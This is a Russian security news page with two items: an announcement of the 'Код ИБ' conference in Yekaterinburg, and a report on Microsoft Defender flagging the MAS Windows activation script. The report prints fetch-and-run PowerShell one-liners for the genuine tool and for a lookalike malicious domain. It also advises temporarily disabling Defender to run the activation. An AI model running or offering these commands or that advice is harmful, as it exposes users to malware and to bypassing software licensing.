Кот ИБ, посетив 5 стран, возвращается в Екатеринбург

Кот ИБ, посетив 5 стран, возвращается в Екатеринбург

Кот ИБ, посетив 5 стран, возвращается в Екатеринбург

21 сентября в бизнес-отеле “Московская горка”, в рамках масштабного тура, охватившего в этом году 5 стран (26 городов), состоится открытая конференция для профессионалов “Код информационной безопасности”.

“Код информационной безопасности” - самая масштабная русскоговорящая конференция по кибербезопасности родом из Екатеринбурга - привезет домой не только легендарного Кота ИБ, но и экспертов из Москвы, Санкт-Петербурга и Минска.

Участников ожидает предельно насыщенная программа с параллельными потоками, при участии почти двух десятков докладчиков. Речь пойдет о трендах и технологиях кибербезопасности, нюансах управления ИБ, главных ИБ-проблемах и их решениях.

Выступят известные блогеры Алексей Комаров (УЦСБ, г. Москва) и Евгений Царев (RTM Group, г. Москва), а также Максим Степченков (IT-Task, г. Москва), Валерий Вершинин (Конфидент, Санкт-Петербург), Вячеслав Медведев (Доктор Веб, г. Москва), Александр Волков (IBA IT Park) и многие другие.

Столицу Урала представит Константин Сергеев - директор по безопасности ТС “Монетка”, руководитель НП “Союз руководителей служб безопасности Урала”.

Особое внимание  в программе уделено передовым технологиям защиты информации. Одна из крупнейших технологических компаний Белоруси, минская IBA Group (спонсор секции), поделится опытом внедрений IDM-систем, а “Лаборатория Касперского” (спонсор секции) совместно с “Астерит” (спонсор секции) поведают о нюансах управления ИБ и нашумевшей программе повышения осведомленности. Отдельно будут представлены новейшие разработки Ростелекома (спонсор секции).

Также впервые уральское ИБ-сообщество протестирует новый формат заключительной секции - “Горячую десятку “Кода ИБ”. Эксперты и участники вместе составят ТОП-10 главных ИБ-проблем по версии уральского сообщества и обсудят варианты их решения.

Вход для руководителей и сотрудников подразделений ИТ и ИБ,а также журналистов - бесплатный. Регистрация и аккредитация на сайте: http://codeib.ru/ekaterinburg/

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru